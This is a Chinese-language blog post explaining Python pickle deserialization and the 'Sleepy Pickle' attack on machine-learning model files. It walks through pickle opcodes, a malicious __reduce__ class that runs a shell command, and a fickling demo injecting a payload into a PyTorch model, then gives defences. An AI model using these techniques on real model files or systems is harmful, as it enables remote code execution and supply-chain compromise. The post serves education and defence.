<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
<meta name="viewport"
      content="width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">

    <meta name="author" content="yunshiuan">





<title>Sleepy Pickle | yunshiuan</title>



    <link rel="icon" href="/favicon.ico">



<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=IBM+Plex+Sans+JP:wght@300;400;500;700&family=Noto+Sans+TC:wght@300;400;500;700&display=swap" rel="stylesheet">



    <!-- stylesheets list from _config.yml -->
    
    <link rel="stylesheet" href="/css/style.css">
    



    <!-- scripts list from _config.yml -->
    
    <script src="/js/script.js"></script>
    
    <script src="/js/tocbot.min.js"></script>
    



    
    
        
    


<meta name="generator" content="Hexo 7.3.0"><link rel="stylesheet" href="/css/prism-tomorrow.css" type="text/css">
<link rel="stylesheet" href="/css/prism-line-numbers.css" type="text/css"><link rel="alternate" href="/atom.xml" title="yunshiuan" type="application/atom+xml">
</head>

<body>
    <script>
        // this function is used to check current theme before page loaded.
        (() => {
            const pagebody = document.getElementsByTagName('body')[0]

            function setTheme(status) {

                if (status === 'dark') {
                    window.sessionStorage.theme = 'dark'
                    pagebody.classList.add('dark-theme');

                } else if (status === 'light') {
                    window.sessionStorage.theme = 'light'
                    pagebody.classList.remove('dark-theme');
                }
            };

            setTheme(window.sessionStorage.theme)
        })();
    </script>

    <div class="wrapper"">
        <header>
    <nav class="navbar">
        <div class="container">
            <div class="navbar-header header-logo"><a href="/">yunshiuan&#39;s Blog</a></div>
            <div class="menu navbar-right">
                
                <a class="menu-item" href="/archives">Posts</a>
                
                <a class="menu-item" href="/category">Categories</a>
                
                <a class="menu-item" href="/tag">Tags</a>
                
                <a class="menu-item" href="/about">About</a>
                
                
                <input id="switch_default" type="checkbox" class="switch_default">
                <label for="switch_default" class="toggleBtn"></label>
            </div>
        </div>
    </nav>

    
    <nav class="navbar-mobile" id="nav-mobile">
        <div class="container">
            <div class="navbar-header">
                <div>
                    <a href="/">yunshiuan&#39;s Blog</a><a id="mobile-toggle-theme">·&nbsp;Light</a>
                </div>
                <div class="menu-toggle" onclick="mobileBtn()">
                    <svg class="menu-icon" xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><path fill="currentColor" d="M4.5 17.27q-.213 0-.356-.145T4 16.768t.144-.356t.356-.143h15q.213 0 .356.144q.144.144.144.357t-.144.356t-.356.143zm0-4.77q-.213 0-.356-.144T4 11.999t.144-.356t.356-.143h15q.213 0 .356.144t.144.357t-.144.356t-.356.143zm0-4.77q-.213 0-.356-.143Q4 7.443 4 7.23t.144-.356t.356-.143h15q.213 0 .356.144T20 7.23t-.144.356t-.356.144z"/></svg>
                    <svg class="close-icon" xmlns="http://www.w3.org/2000/svg" width="32" height="32" viewBox="0 0 24 24"><!-- Icon from Material Symbols Light by Google - https://github.com/google/material-design-icons/blob/master/LICENSE --><path fill="currentColor" d="m12 12.708l-5.246 5.246q-.14.14-.344.15t-.364-.15t-.16-.354t.16-.354L11.292 12L6.046 6.754q-.14-.14-.15-.344t.15-.364t.354-.16t.354.16L12 11.292l5.246-5.246q.14-.14.345-.15q.203-.01.363.15t.16.354t-.16.354L12.708 12l5.246 5.246q.14.14.15.345q.01.203-.15.363t-.354.16t-.354-.16z"/></svg>
                </div>
            </div>
            <div class="menu" id="mobile-menu">
                
                <a class="menu-item" href="/archives">Posts</a>
                
                <a class="menu-item" href="/category">Categories</a>
                
                <a class="menu-item" href="/tag">Tags</a>
                
                <a class="menu-item" href="/about">About</a>
                
            </div>
        </div>
    </nav>

</header>
<script>
    var mobileBtn = function f() {
        var toggleMenu = document.getElementsByClassName("menu-toggle")[0];
        var mobileMenu = document.getElementById("mobile-menu");
        if (toggleMenu.classList.contains("active")) {
            toggleMenu.classList.remove("active")
            mobileMenu.classList.remove("active")
        } else {
            toggleMenu.classList.add("active")
            mobileMenu.classList.add("active")
        }
    }
</script>
            <div class="main">
                <div class="container">
    
    
        <div class="post-toc">
    <div class="tocbot-list">
    </div>
    <div class="tocbot-list-menu">
        <a class="tocbot-toc-expand" onclick="expand_toc()">Expand all</a>
        <a onclick="go_top()">Back to top</a>
        <a onclick="go_bottom()">Go to bottom</a>
    </div>
</div>

<script>
    var tocbot_timer;
    var DEPTH_MAX = 6; // 为 6 时展开所有
    var tocbot_default_config = {
        tocSelector: '.tocbot-list',
        contentSelector: '.post-content',
        headingSelector: 'h1, h2, h3, h4, h5',
        orderedList: false,
        scrollSmooth: true,
        onClick: extend_click,
    };

    function extend_click() {
        clearTimeout(tocbot_timer);
        tocbot_timer = setTimeout(function() {
            tocbot.refresh(obj_merge(tocbot_default_config, {
                hasInnerContainers: true
            }));
        }, 420); // 这个值是由 tocbot 源码里定义的 scrollSmoothDuration 得来的
    }

    document.ready(function() {
        tocbot.init(obj_merge(tocbot_default_config, {
            collapseDepth: 1
        }));
    });

    function expand_toc() {
        var b = document.querySelector('.tocbot-toc-expand');
        var expanded = b.getAttribute('data-expanded');
        expanded ? b.removeAttribute('data-expanded') : b.setAttribute('data-expanded', true);
        tocbot.refresh(obj_merge(tocbot_default_config, {
            collapseDepth: expanded ? 1 : DEPTH_MAX
        }));
        b.innerText = expanded ? 'Expand all' : 'Collapse all';
    }

    function go_top() {
        window.scrollTo(0, 0);
    }

    function go_bottom() {
        window.scrollTo(0, document.body.scrollHeight);
    }

    function obj_merge(target, source) {
        for (var item in source) {
            if (source.hasOwnProperty(item)) {
                target[item] = source[item];
            }
        }
        return target;
    }
</script>
    

    
    <article class="post-wrap">
        <header class="post-header">
            <h1 class="post-title">Sleepy Pickle</h1>
            
                <div class="post-meta">
                    
                        Author: <a itemprop="author" rel="author" href="/">yunshiuan</a>
                    

                    
                        <span class="post-time">
                        Date: <a href="#">August 14, 2025&nbsp;&nbsp;15:53:53</a>
                        </span>
                    
                    
                        <span class="post-category">
                    Category:
                            
                                <a href="/categories/Blog/">Blog</a>
                            
                        </span>
                    
                </div>
            
        </header>

        <div class="post-content">
            <h1 id="💤🥒Sleeply-Pickle"><a href="#💤🥒Sleeply-Pickle" class="headerlink" title="💤🥒Sleeply Pickle"></a>💤🥒Sleeply Pickle</h1><p>Demo code : <a target="_blank" rel="noopener" href="https://github.com/YunshiuanOAO/SleepyPickle-Demo">https://github.com/YunshiuanOAO/SleepyPickle-Demo</a></p>
<p>Slido : <a target="_blank" rel="noopener" href="https://speakerdeck.com/yunshiuanoao/sleeplypickle">https://speakerdeck.com/yunshiuanoao/sleeplypickle</a></p>
<h2 id="♻️序列化-Serialization-反序列化-Deserialization"><a href="#♻️序列化-Serialization-反序列化-Deserialization" class="headerlink" title="♻️序列化(Serialization)&#x2F;反序列化(Deserialization)"></a>♻️序列化(Serialization)&#x2F;反序列化(Deserialization)</h2><p>序列化是將一個資料結構或物件轉換成一種可以儲存或交換的格式（如位元組流、JSON、XML 等）。這樣的轉換讓物件能夠寫入檔案、透過網路傳輸，或儲存在資料庫中。</p>
<p>反序列化則是將儲存的數據或接收到的數據轉換回原始的物件或資料結構。</p>
<p><img src="/./assets/picklePic.png" alt="alt text"></p>
<hr>
<h2 id="🥒-What-is-Pickle"><a href="#🥒-What-is-Pickle" class="headerlink" title="🥒 What is Pickle?"></a>🥒 What is Pickle?</h2><p>Pickle 是 Python 的內建模組，提供了將 Python 物件序列化和反序列化的功能。</p>
<p>常見用途</p>
<dl><dt>:    將物件儲存到檔案中，方便之後載入。<br>:    將物件透過網路或其他通道進行傳輸。</dt><dd><strong>快速儲存和載入機器學習模型、配置檔或計算結果</strong>。</dd></dl><p>支援的物件類型</p>
<dl><dt>:    Pickle 支援多種 Python 內建的資料型態，包括：<br>:    ✔️ 數字（int, float）<br>:    ✔️ 字串（str）<br>:    ✔️ 列表（list）、元組（tuple）、字典（dict）、集合（set）<br>:    ✔️ 自訂類別物件</dt><dd>✔️ 函數</dd></dl><p>Example : </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> pickletools</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">data = &#123;<span class="string">&quot;name&quot;</span>: <span class="string">&quot;Alice&quot;</span>, <span class="string">&quot;age&quot;</span>: <span class="number">30</span>, <span class="string">&quot;scores&quot;</span>: [<span class="number">88</span>, <span class="number">92</span>, <span class="number">95</span>]&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;data.pkl&quot;</span>, <span class="string">&quot;wb&quot;</span>) <span class="keyword">as</span> file:</span><br><span class="line">    pickle.dump(data, file, protocol=<span class="number">0</span>)</span><br><span class="line">    <span class="built_in">print</span>(<span class="string">&quot;Data has been successfully serialized to data.pkl&quot;</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&quot;data.pkl&quot;</span>, <span class="string">&quot;rb&quot;</span>) <span class="keyword">as</span> file:</span><br><span class="line">    unpickled_data = pickle.load(file)</span><br><span class="line">    <span class="built_in">print</span>(unpickled_data)</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>Output: </p>
<figure class="highlight lasso"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">Data</span> has been successfully serialized <span class="keyword">to</span> <span class="built_in">data</span>.pkl</span><br><span class="line">&#123;<span class="string">&#x27;name&#x27;</span>: <span class="string">&#x27;Alice&#x27;</span>, <span class="string">&#x27;age&#x27;</span>: <span class="number">30</span>, <span class="string">&#x27;scores&#x27;</span>: <span class="meta">[</span><span class="number">88</span>, <span class="number">92</span>, <span class="number">95</span><span class="meta">]</span>&#125;</span><br></pre></td></tr></table></figure>

<p>可以使用pickletools將pickle執行的內容dump出來</p>
<figure class="highlight nestedtext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">    <span class="attribute">0</span><span class="punctuation">:</span> <span class="string">(    MARK</span></span><br><span class="line">    <span class="attribute">1</span><span class="punctuation">:</span> <span class="string">d        DICT       (MARK at 0)</span></span><br><span class="line">    <span class="attribute">2</span><span class="punctuation">:</span> <span class="string">p    PUT        0</span></span><br><span class="line">    <span class="attribute">5</span><span class="punctuation">:</span> <span class="string">V    UNICODE    &#x27;name&#x27;</span></span><br><span class="line">   <span class="attribute">11</span><span class="punctuation">:</span> <span class="string">p    PUT        1</span></span><br><span class="line">   <span class="attribute">14</span><span class="punctuation">:</span> <span class="string">V    UNICODE    &#x27;Alice&#x27;</span></span><br><span class="line">   <span class="attribute">21</span><span class="punctuation">:</span> <span class="string">p    PUT        2</span></span><br><span class="line">   <span class="attribute">24</span><span class="punctuation">:</span> <span class="string">s    SETITEM</span></span><br><span class="line">   <span class="attribute">25</span><span class="punctuation">:</span> <span class="string">V    UNICODE    &#x27;age&#x27;</span></span><br><span class="line">   <span class="attribute">30</span><span class="punctuation">:</span> <span class="string">p    PUT        3</span></span><br><span class="line">   <span class="attribute">33</span><span class="punctuation">:</span> <span class="string">I    INT        30</span></span><br><span class="line">   <span class="attribute">37</span><span class="punctuation">:</span> <span class="string">s    SETITEM</span></span><br><span class="line">   <span class="attribute">38</span><span class="punctuation">:</span> <span class="string">V    UNICODE    &#x27;scores&#x27;</span></span><br><span class="line">   <span class="attribute">46</span><span class="punctuation">:</span> <span class="string">p    PUT        4</span></span><br><span class="line">   <span class="attribute">49</span><span class="punctuation">:</span> <span class="string">(    MARK</span></span><br><span class="line">   <span class="attribute">50</span><span class="punctuation">:</span> <span class="string">l        LIST       (MARK at 49)</span></span><br><span class="line">   <span class="attribute">51</span><span class="punctuation">:</span> <span class="string">p    PUT        5</span></span><br><span class="line">   <span class="attribute">54</span><span class="punctuation">:</span> <span class="string">I    INT        88</span></span><br><span class="line">   <span class="attribute">58</span><span class="punctuation">:</span> <span class="string">a    APPEND</span></span><br><span class="line">   <span class="attribute">59</span><span class="punctuation">:</span> <span class="string">I    INT        92</span></span><br><span class="line">   <span class="attribute">63</span><span class="punctuation">:</span> <span class="string">a    APPEND</span></span><br><span class="line">   <span class="attribute">64</span><span class="punctuation">:</span> <span class="string">I    INT        95</span></span><br><span class="line">   <span class="attribute">68</span><span class="punctuation">:</span> <span class="string">a    APPEND</span></span><br><span class="line">   <span class="attribute">69</span><span class="punctuation">:</span> <span class="string">s    SETITEM</span></span><br><span class="line">   <span class="attribute">70</span><span class="punctuation">:</span> <span class="string">.    STOP</span></span><br><span class="line">highest protocol among opcodes = 0</span><br></pre></td></tr></table></figure>

<p>由上面的資訊可以得知，其實Pickle在反序列化的過成就很像一個簡易的堆疊虛擬機在執行，透過Opcode並且在Pickle Virtual Machine執行<br>主要由這三個</p>
<ul>
<li><p>指令處理器 (Instruction Processor)</p>
<p>  從指令流 (byte stream) 中讀取 opcode 與參數，並依序進行解譯與處理。</p>
<p>  不斷重複「讀取 -&gt; 處理」的流程，直到遇到結束符號（通常是 .）後停止。</p>
<p>  反序列化結束時，最終留在 stack 頂端的值將作為反序列化結果返回。</p>
</li>
<li><p>Stack (堆疊)</p>
<p>  由 Python 的 list 實作。</p>
<p>  用於暫時儲存資料、參數以及各種物件。</p>
<p>  各種 opcode 會操作此堆疊（如推入、彈出、組合容器等）。</p>
</li>
<li><p>Memo (備忘錄)</p>
<p>  由 Python 的 dict 實作。</p>
<p>  在 PVM 整個生命週期中，負責儲存先前出現過的物件，以便重複引用或避免重複建立。</p>
<p>  透過索引或序號 (index) 來存取對應物件。</p>
</li>
</ul>
<p>以下為常用的opcode </p>
<table>
<thead>
<tr>
<th align="center"><strong>指令</strong></th>
<th align="left"><strong>描述</strong></th>
<th align="left"><strong>具體寫法</strong></th>
<th align="left"><strong>對 stack 的變化</strong></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><strong>c</strong></td>
<td align="left">取得一個全局物件或 import 一個模組</td>
<td align="left"><code>c[module]\n[instance]\n</code></td>
<td align="left">取得的物件入 stack</td>
</tr>
<tr>
<td align="center"><strong>o</strong></td>
<td align="left">尋找 stack 中的上一個 MARK，以之間的第一個資料（必須為函數）為 callable，第二個到第 n 個資料為參數，執行該函數（或實例化一個物件）</td>
<td align="left"><code>o</code></td>
<td align="left">這個過程中涉及到的資料都出 stack，函數的返回值（或生成的物件）入 stack</td>
</tr>
<tr>
<td align="center"><strong>i</strong></td>
<td align="left">相當於 c 和 o 的組合，先取得一個全局函數，然後尋找 stack 中的上一個 MARK，並組合之間的資料為元組，再以該元組為參數執行全局函數（或實例化一個物件）</td>
<td align="left"><code>i[module]\n[callable]\n</code></td>
<td align="left">這個過程中涉及到的資料都出 stack，函數返回值（或生成的物件）入 stack</td>
</tr>
<tr>
<td align="center"><strong>N</strong></td>
<td align="left">實例化一個 None</td>
<td align="left"><code>N</code></td>
<td align="left">取得的 None 對象入 stack</td>
</tr>
<tr>
<td align="center"><strong>S</strong></td>
<td align="left">實例化一個字串對象</td>
<td align="left"><code>S&#39;xxx&#39;\n</code><br>也可使用雙引號或 <code>\&#39;</code> 等 Python 字串形式</td>
<td align="left">取得的字串對象入 stack</td>
</tr>
<tr>
<td align="center"><strong>V</strong></td>
<td align="left">實例化一個 Unicode 字串對象</td>
<td align="left"><code>Vxxx\n</code></td>
<td align="left">取得的字串對象入 stack</td>
</tr>
<tr>
<td align="center"><strong>I</strong></td>
<td align="left">實例化一個 int 對象</td>
<td align="left"><code>Ixxx\n</code></td>
<td align="left">取得的整數對象入 stack</td>
</tr>
<tr>
<td align="center"><strong>F</strong></td>
<td align="left">實例化一個 float 對象</td>
<td align="left"><code>Fx.x\n</code></td>
<td align="left">取得的浮點數對象入 stack</td>
</tr>
<tr>
<td align="center"><strong>R</strong></td>
<td align="left">選擇 stack 上的第一個對象作為函數、第二個對象作為參數（第二個對象必須為元組），然後呼叫該函數</td>
<td align="left"><code>R</code></td>
<td align="left">函數和參數出 stack，函數的返回值入 stack</td>
</tr>
<tr>
<td align="center"><strong>.</strong></td>
<td align="left">程式結束，stack 頂的單一元素作為 <code>pickle.loads()</code> 的返回值</td>
<td align="left"><code>.</code></td>
<td align="left">無</td>
</tr>
<tr>
<td align="center"><strong>(</strong></td>
<td align="left">向 stack 中壓入一個 MARK 標記</td>
<td align="left"><code>(</code></td>
<td align="left">MARK 標記入 stack</td>
</tr>
<tr>
<td align="center"><strong>t</strong></td>
<td align="left">尋找 stack 中的上一個 MARK，並組合之間的資料為元組</td>
<td align="left"><code>t</code></td>
<td align="left">MARK 標記以及被組合的資料出 stack，生成的元組入 stack</td>
</tr>
<tr>
<td align="center"><strong>)</strong></td>
<td align="left">向 stack 中直接壓入一個空元組</td>
<td align="left"><code>)</code></td>
<td align="left">空元組入 stack</td>
</tr>
<tr>
<td align="center"><strong>l</strong></td>
<td align="left">尋找 stack 中的上一個 MARK，並組合之間的資料為列表</td>
<td align="left"><code>l</code></td>
<td align="left">MARK 標記以及被組合的資料出 stack，生成的列表入 stack</td>
</tr>
<tr>
<td align="center"><strong>]</strong></td>
<td align="left">向 stack 中直接壓入一個空列表</td>
<td align="left"><code>]</code></td>
<td align="left">空列表入 stack</td>
</tr>
<tr>
<td align="center"><strong>d</strong></td>
<td align="left">尋找 stack 中的上一個 MARK，並組合之間的資料為字典（資料必須有偶數個，即呈 key-value 對）</td>
<td align="left"><code>d</code></td>
<td align="left">MARK 標記以及被組合的資料出 stack，生成的字典入 stack</td>
</tr>
<tr>
<td align="center"><strong>}</strong></td>
<td align="left">向 stack 中直接壓入一個空字典</td>
<td align="left"><code>&#125;</code></td>
<td align="left">空字典入 stack</td>
</tr>
<tr>
<td align="center"><strong>p</strong></td>
<td align="left">將 stack 頂對象儲存至 memo_n</td>
<td align="left"><code>pn\n</code></td>
<td align="left">無</td>
</tr>
<tr>
<td align="center"><strong>g</strong></td>
<td align="left">將 memo_n 的對象壓入 stack</td>
<td align="left"><code>gn\n</code></td>
<td align="left">將指定索引的 memo 對象入 stack</td>
</tr>
<tr>
<td align="center"><strong>0</strong></td>
<td align="left">丟棄 stack 頂對象</td>
<td align="left"><code>0</code></td>
<td align="left">stack 頂對象被丟棄</td>
</tr>
<tr>
<td align="center"><strong>b</strong></td>
<td align="left">使用 stack 中的第一個元素（儲存多個屬性名: 屬性值的字典）對第二個元素（對象實例）進行屬性設置</td>
<td align="left"><code>b</code></td>
<td align="left">stack 上第一個元素出 stack；第二個元素（對象）被更新</td>
</tr>
<tr>
<td align="center"><strong>s</strong></td>
<td align="left">將 stack 的第一個和第二個對象作為 key-value 對，添加或更新到 stack 的第三個對象（必須為列表或字典，列表以數字作為 key）</td>
<td align="left"><code>s</code></td>
<td align="left">第一、二個元素出 stack，第三個元素（列表或字典）被更新</td>
</tr>
<tr>
<td align="center"><strong>u</strong></td>
<td align="left">尋找 stack 中的上一個 MARK，組合之間的資料（必須有偶數個，即 key-value 對）並全部添加或更新到該 MARK 之前的一個對象（必須為字典）</td>
<td align="left"><code>u</code></td>
<td align="left">MARK 標記以及被組合的資料出 stack，字典被更新</td>
</tr>
<tr>
<td align="center"><strong>a</strong></td>
<td align="left">將 stack 的第一個元素 append 到第二個元素（列表）中</td>
<td align="left"><code>a</code></td>
<td align="left">stack 頂元素出 stack，第二個元素（列表）被更新</td>
</tr>
<tr>
<td align="center"><strong>e</strong></td>
<td align="left">尋找 stack 中的上一個 MARK，組合之間的資料並 extends 到該 MARK 之前的一個元素（必須為列表）</td>
<td align="left"><code>e</code></td>
<td align="left">MARK 標記以及被組合的資料出 stack，列表被更新</td>
</tr>
</tbody></table>
<hr>
<h2 id="⚠️What’s-Wrong-with-Pickle"><a href="#⚠️What’s-Wrong-with-Pickle" class="headerlink" title="⚠️What’s Wrong with Pickle ?"></a>⚠️What’s Wrong with Pickle ?</h2><p>Pickle文檔上有出現這一個警告<br><img src="/./assets/image.png" alt="alt text"></p>
<p>Pickle當中有一個 <code>__reduce__</code> 可以使用，當反序列化時會自動呼叫</p>
<p>以下範例為製作一個惡意的pickle</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> subprocess</span><br><span class="line"></span><br><span class="line"><span class="keyword">class</span> <span class="title class_">EvilPickle</span>:</span><br><span class="line">    <span class="keyword">def</span> <span class="title function_">__reduce__</span>(<span class="params">self</span>):</span><br><span class="line">        <span class="keyword">return</span> (subprocess.Popen, ((<span class="string">&#x27;ls&#x27;</span>,),))</span><br><span class="line">e =  EvilPickle()</span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">&#x27;evil.pkl&#x27;</span>, <span class="string">&#x27;wb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">    pickle.dump(e, f)</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>用pickletool 把惡意pickle檔dump出來看看</p>
<figure class="highlight nestedtext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">    <span class="attribute">0</span><span class="punctuation">:</span> <span class="string">c    GLOBAL     &#x27;commands Popen&#x27;</span></span><br><span class="line">   <span class="attribute">16</span><span class="punctuation">:</span> <span class="string">p    PUT        0</span></span><br><span class="line">   <span class="attribute">19</span><span class="punctuation">:</span> <span class="string">(    MARK</span></span><br><span class="line">   <span class="attribute">20</span><span class="punctuation">:</span> <span class="string">(        MARK</span></span><br><span class="line">   <span class="attribute">21</span><span class="punctuation">:</span> <span class="string">V            UNICODE    &#x27;ls&#x27;</span></span><br><span class="line">   <span class="attribute">25</span><span class="punctuation">:</span> <span class="string">p            PUT        1</span></span><br><span class="line">   <span class="attribute">28</span><span class="punctuation">:</span> <span class="string">t            TUPLE      (MARK at 20)</span></span><br><span class="line">   <span class="attribute">29</span><span class="punctuation">:</span> <span class="string">p        PUT        2</span></span><br><span class="line">   <span class="attribute">32</span><span class="punctuation">:</span> <span class="string">t        TUPLE      (MARK at 19)</span></span><br><span class="line">   <span class="attribute">33</span><span class="punctuation">:</span> <span class="string">p    PUT        3</span></span><br><span class="line">   <span class="attribute">36</span><span class="punctuation">:</span> <span class="string">R    REDUCE</span></span><br><span class="line">   <span class="attribute">37</span><span class="punctuation">:</span> <span class="string">p    PUT        4</span></span><br><span class="line">   <span class="attribute">40</span><span class="punctuation">:</span> <span class="string">.    STOP</span></span><br><span class="line">highest protocol among opcodes = 0</span><br></pre></td></tr></table></figure>

<p>執行結果：<br><img src="/./assets/reduce_RCE.png" alt="alt text"></p>
<p>即可執行<code>ls</code>指令</p>
<hr>
<h2 id="💤Sleepy-Pickle"><a href="#💤Sleepy-Pickle" class="headerlink" title="💤Sleepy Pickle"></a>💤Sleepy Pickle</h2><p>利用pickle不安全的特性，將惡意的Bytecode植入使用pickle的模型檔案內。</p>
<p><img src="/./assets/image-2.png" alt="alt text"><br>有一個針對此攻擊而產生的工具：<a target="_blank" rel="noopener" href="https://github.com/trailofbits/fickling">fickling</a></p>
<p>此工具可以輕易的將想要執行的程式轉成bytecode值入進pickle中，另外也有檢測pickele內的惡意行為功能</p>
<p>demo:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> torch</span><br><span class="line"><span class="keyword">import</span> torchvision.models <span class="keyword">as</span> models</span><br><span class="line"><span class="keyword">import</span> warnings</span><br><span class="line"><span class="keyword">from</span> fickling.pytorch <span class="keyword">import</span> PyTorchModelWrapper</span><br><span class="line">warnings.filterwarnings(<span class="string">&quot;ignore&quot;</span>)</span><br><span class="line"></span><br><span class="line">model = models.mobilenet_v2()</span><br><span class="line">torch.save(model, <span class="string">&quot;mobilenet.pth&quot;</span>)</span><br><span class="line"></span><br><span class="line">result = PyTorchModelWrapper(<span class="string">&quot;mobilenet.pth&quot;</span>)</span><br><span class="line"></span><br><span class="line">temp_filename = <span class="string">&quot;temp_filename.pt&quot;</span></span><br><span class="line">result.inject_payload(</span><br><span class="line">    <span class="string">&quot;print(&#x27;Inject successful!&#x27;)&quot;</span>,</span><br><span class="line">    temp_filename,</span><br><span class="line">    injection=<span class="string">&quot;insertion&quot;</span>,</span><br><span class="line">    overwrite=<span class="literal">True</span>,</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="comment"># Load file with injected payload</span></span><br><span class="line">torch.load(<span class="string">&quot;mobilenet.pth&quot;</span>)</span><br></pre></td></tr></table></figure>

<p>輸出：</p>
<p><img src="/./assets/image-1.png" alt="alt text"></p>
<p>在 Hugging face 上在目前常出現的是<code>pytorch_model.bin</code><br><img src="/./assets/image-3.png" alt="alt text"></p>
<p>pytorch_model.bin是使用PyTorch中的torch.save 函數所生成的二進位檔案，裡面會存 weights, biases, 或者其他parameters，如果將它unzip會有一個data.pkl可以利用(會依照Pytorch不同的版本裡面會包含不同的檔案)</p>
<p>!!! info</p>
<pre><code>* PyTorch v0.1.1: Tar file with sys_info, pickle, storages, and tensors
* PyTorch v0.1.10: Stacked pickle files
* TorchScript v1.0: ZIP file with model.json
* TorchScript v1.1: ZIP file with model.json and attributes.pkl
* TorchScript v1.3: ZIP file with data.pkl and constants.pkl
* TorchScript v1.4: ZIP file with data.pkl, constants.pkl, and version set at 2 or higher (2 pickle files and a folder)
* PyTorch v1.3: ZIP file containing data.pkl (1 pickle file)
* PyTorch model archive format[ZIP]: ZIP file that includes Python code files and pickle files
</code></pre>
<p><img src="/./assets/image-4.png" alt="alt text"></p>
<p>!!! warning “PyTorch適用版本”<br>    PyTorch &lt;2.6 在最新 2.6版本中，Pytorch 將 torch.load 的參數weights_only預設為True</p>
<pre><code>&gt; Also in this release as an important security improvement measure we have changed the default value for weights_only parameter of torch.load. This is a backward compatibility-breaking change, please see this forum post for more details.
</code></pre>
<p>接下來Hacker 會先透過中間人攻擊、供應鏈攻擊、社交工程等手法，將惡意Pickle檔案傳送至受害者的系統，一旦反序列化後有可能會進行以下的惡意攻擊</p>
<ul>
<li>修改模型參數</li>
</ul>
<p>可以去微調模型的參數讓他輸出出誤導性或有惡意的輸出</p>
<p>如：<a target="_blank" rel="noopener" href="https://rome.baulab.info/">ROME</a></p>
<p><img src="/./assets/image6.png" alt="alt text"></p>
<ul>
<li>釣魚</li>
</ul>
<p>可以在每次問答時插入惡意的連結<br><img src="/./assets/image-5.png" alt="alt text"></p>
<ul>
<li>埋後門</li>
<li>XSS</li>
<li>竊取使用者資料</li>
<li>竄改資料</li>
<li>…</li>
</ul>
<hr>
<h2 id="🦾How-To-Prevent"><a href="#🦾How-To-Prevent" class="headerlink" title="🦾How To Prevent"></a>🦾How To Prevent</h2><ul>
<li>不要使用Pickle，使用 SafeTensors.</li>
<li>如果一定要使用Pickle，需要使用fickling對pickle進行掃描或者限制unpickler</li>
</ul>
<hr>
<h2 id="📚Reference"><a href="#📚Reference" class="headerlink" title="📚Reference"></a>📚Reference</h2><ul>
<li><p><a target="_blank" rel="noopener" href="https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-1/">Exploiting ML models with pickle file attacks: Part 1</a></p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://blog.trailofbits.com/2024/06/11/exploiting-ml-models-with-pickle-file-attacks-part-2/">Exploiting ML models with pickle file attacks: Part 2</a></p>
</li>
<li><p><a target="_blank" rel="noopener" href="https://blog.trailofbits.com/2021/03/15/never-a-dill-moment-exploiting-machine-learning-pickle-files/">Never a dill moment: Exploiting machine learning pickle files</a></p>
</li>
